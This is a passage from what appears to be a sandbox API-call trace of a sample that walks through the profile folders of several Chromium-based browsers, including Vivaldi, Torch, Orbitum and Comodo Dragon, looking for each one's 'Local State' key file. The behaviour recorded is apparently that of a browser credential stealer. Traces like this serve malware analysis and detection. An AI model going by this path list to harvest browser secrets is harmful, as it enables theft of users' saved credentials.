ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7464d0, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.122] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.122] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Amigo\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\" [0109.122] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\" [0109.122] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\\\" [0109.122] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\\\Local State" [0109.122] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=65, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0109.123] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x82) returned 0x3970048 [0109.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=65, lpWideCharStr=0x3970048, cchWideChar=65 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\\\Local State") returned 65 [0109.123] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a11c0 [0109.123] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.123] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\amigo\\user data\\local state")) returned 0xffffffff [0109.123] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.123] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.123] GetLastError () returned 0x3 [0109.123] SetLastError (dwErrCode=0x3) [0109.123] GetLastError () returned 0x3 [0109.123] SetLastError (dwErrCode=0x3) [0109.123] GetLastError () returned 0x3 [0109.123] SetLastError (dwErrCode=0x3) [0109.123] GetLastError () returned 0x3 [0109.123] SetLastError (dwErrCode=0x3) [0109.123] GetLastError () returned 0x3 [0109.123] SetLastError (dwErrCode=0x3) [0109.123] GetLastError () returned 0x3 [0109.123] SetLastError (dwErrCode=0x3) [0109.123] GetLastError () returned 0x3 [0109.123] SetLastError (dwErrCode=0x3) [0109.123] GetLastError () returned 0x3 [0109.124] SetLastError (dwErrCode=0x3) [0109.124] GetLastError () returned 0x3 [0109.124] SetLastError (dwErrCode=0x3) [0109.124] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x208007e, ftCreationTime.dwLowDateTime=0x90, ftCreationTime.dwHighDateTime=0x208007e, ftLastAccessTime.dwLowDateTime=0x19f010, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x12, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73a400, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.124] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.124] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Torch\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\" [0109.124] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\" [0109.124] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\\\" [0109.124] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\\\Local State" [0109.125] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=65, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0109.125] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x82) returned 0x3970048 [0109.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=65, lpWideCharStr=0x3970048, cchWideChar=65 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\\\Local State") returned 65 [0109.125] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a11c0 [0109.125] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.125] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\torch\\user data\\local state")) returned 0xffffffff [0109.125] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.125] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.125] GetLastError () returned 0x3 [0109.125] SetLastError (dwErrCode=0x3) [0109.125] GetLastError () returned 0x3 [0109.125] SetLastError (dwErrCode=0x3) [0109.125] GetLastError () returned 0x3 [0109.125] SetLastError (dwErrCode=0x3) [0109.125] GetLastError () returned 0x3 [0109.125] SetLastError (dwErrCode=0x3) [0109.125] GetLastError () returned 0x3 [0109.125] SetLastError (dwErrCode=0x3) [0109.125] GetLastError () returned 0x3 [0109.126] SetLastError (dwErrCode=0x3) [0109.126] GetLastError () returned 0x3 [0109.126] SetLastError (dwErrCode=0x3) [0109.126] GetLastError () returned 0x3 [0109.126] SetLastError (dwErrCode=0x3) [0109.126] GetLastError () returned 0x3 [0109.126] SetLastError (dwErrCode=0x3) [0109.126] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x208007e, ftCreationTime.dwLowDateTime=0x90, ftCreationTime.dwHighDateTime=0x208007e, ftLastAccessTime.dwLowDateTime=0x19f010, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x12, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x739ef0, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.126] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.126] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Orbitum\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\" [0109.126] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\" [0109.126] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\\\" [0109.126] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\\\Local State" [0109.126] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=67, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0109.126] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x86) returned 0x3970048 [0109.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=67, lpWideCharStr=0x3970048, cchWideChar=67 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\\\Local State") returned 67 [0109.127] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a11c0 [0109.127] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.127] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\orbitum\\user data\\local state")) returned 0xffffffff [0109.127] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.127] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.127] GetLastError () returned 0x3 [0109.127] SetLastError (dwErrCode=0x3) [0109.127] GetLastError () returned 0x3 [0109.127] SetLastError (dwErrCode=0x3) [0109.127] GetLastError () returned 0x3 [0109.127] SetLastError (dwErrCode=0x3) [0109.127] GetLastError () returned 0x3 [0109.127] SetLastError (dwErrCode=0x3) [0109.127] GetLastError () returned 0x3 [0109.127] SetLastError (dwErrCode=0x3) [0109.127] GetLastError () returned 0x3 [0109.127] SetLastError (dwErrCode=0x3) [0109.127] GetLastError () returned 0x3 [0109.127] SetLastError (dwErrCode=0x3) [0109.127] GetLastError () returned 0x3 [0109.128] SetLastError (dwErrCode=0x3) [0109.128] GetLastError () returned 0x3 [0109.128] SetLastError (dwErrCode=0x3) [0109.128] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x2080082, ftCreationTime.dwLowDateTime=0x98, ftCreationTime.dwHighDateTime=0x6c0260, ftLastAccessTime.dwLowDateTime=0x7f, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7464d0, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.128] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.128] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Vivaldi\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\" [0109.128] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\" [0109.128] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\\\" [0109.128] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\\\Local State" [0109.128] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=67, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0109.128] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x86) returned 0x3970048 [0109.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=67, lpWideCharStr=0x3970048, cchWideChar=67 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\\\Local State") returned 67 [0109.128] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a11c0 [0109.128] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.128] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\vivaldi\\user data\\local state")) returned 0xffffffff [0109.129] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.129] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.129] GetLastError () returned 0x3 [0109.129] SetLastError (dwErrCode=0x3) [0109.129] GetLastError () returned 0x3 [0109.129] SetLastError (dwErrCode=0x3) [0109.129] GetLastError () returned 0x3 [0109.129] SetLastError (dwErrCode=0x3) [0109.129] GetLastError () returned 0x3 [0109.129] SetLastError (dwErrCode=0x3) [0109.129] GetLastError () returned 0x3 [0109.129] SetLastError (dwErrCode=0x3) [0109.129] GetLastError () returned 0x3 [0109.129] SetLastError (dwErrCode=0x3) [0109.129] GetLastError () returned 0x3 [0109.129] SetLastError (dwErrCode=0x3) [0109.129] GetLastError () returned 0x3 [0109.129] SetLastError (dwErrCode=0x3) [0109.129] GetLastError () returned 0x3 [0109.129] SetLastError (dwErrCode=0x3) [0109.129] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x2080082, ftCreationTime.dwLowDateTime=0x98, ftCreationTime.dwHighDateTime=0x6c0260, ftLastAccessTime.dwLowDateTime=0x7f, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7464d0, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.129] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.130] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Comodo\\Dragon\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\" [0109.130] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\" [0109.130] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\\\" [0109.130] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\\\Local State" [0109.130] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=73, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0109.130] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x92) returned 0x3970048 [0109.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=73, lpWideCharStr=0x3970048, cchWideChar=73 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\\\Local State") returned 73 [0109.130] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a11c0 [0109.130] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.130] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comodo\\dragon\\user data\\local state")) returned 0xffffffff [0109.138] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.138] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.138] GetLastError () returned 0x3 [0109.138] SetLastError (dwErrCode=0x3) [0109.138] GetLastError () returned 0x3 [0109.138] SetLastError (dwErrCode=0x3) [0109.138] GetLastError () returned 0x3 [0109.139] SetLastError (dwErrCode=0x3) [0109.139] GetLastError () returned 0x3 [0109.139] SetLastError (dwErrCode=0x3) [0109.139] GetLastError () returned 0x3 [0109.139] SetLastError (dwErrCode=0x3) [0109.139] GetLastError () returned 0x3 [0109.139] SetLastError (dwErrCode=0x3) [0109.139] GetLastError () returned 0x3 [0109.139] SetLastError (dwErrCode=0x3) [0109.139] GetLastError () returned 0x3 [0109.139] SetLastError (dwErrCode=0x3) [0109.139] GetLastError () returned 0x3 [0109.139] SetLastError (dwErrCode=0x3) [0109.139] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x208008e, ftCreationTime.dwLowDateTime=0xa0, ftCreationTime.dwHighDateTime=0x208008e, ftLastAccessTime.dwLowDateTime=0x19f010, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x14, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x731738, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.139] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.139] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Nichrome\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\" [0109.140] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\" [0109.140] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\\\" [0109.140] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\\\Local State" [0109.140] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=68, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0109.140] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x88) returned 0x3970048 [0109.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=68, lpWideCharStr=0x3970048, cchWideChar=68 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\\\Local State") returned 68 [0109.140] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a11c0 [0109.140] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.140] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\nichrome\\user data\\local state")) returned 0xffffffff [0109.140] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.140] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.140] GetLastError () returned 0x3 [0109.140] SetLastError (dwErrCode=0x3) [0109.140] GetLastError () returned 0x3 [0109.140] SetLastError (dwErrCode=0x3) [0109.140] GetLastError () returned 0x3 [0109.140] SetLastError (dwErrCode=0x3) [0109.140] GetLastError () returned 0x3 [0109.141] SetLastError (dwErrCode=0x3) [0109.141] GetLastError () returned 0x3 [0109.141] SetLastError (dwErrCode=0x3) [0109.141] GetLastError () returned 0x3 [0109.141] SetLastError (dwErrCode=0x3) [0109.141] GetLastError () returned 0x3 [0109.141] SetLastError (dwErrCode=0x3) [0109.141] GetLastError () returned 0x3 [0109.141] SetLastError (dwErrCode=0x3) [0109.141] GetLastError () returned 0x3 [0109.141] SetLastError (dwErrCode=0x3) [0109.141] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x2080084, ftCreationTime.dwLowDateTime=0x98, ftCreationTime.dwHighDateTime=0x6c0260, ftLastAccessTime.dwLowDateTime=0x7f, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7464d0, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.141] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.141] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Maxthon5\\Users\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\" [0109.141] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\" [0109.141] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\\\" [0109.141] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\\\Local State" [0109.142] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a1478 [0109.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=64, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0109.142] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x3970048 [0109.142] MultiByteToWideChar (in: 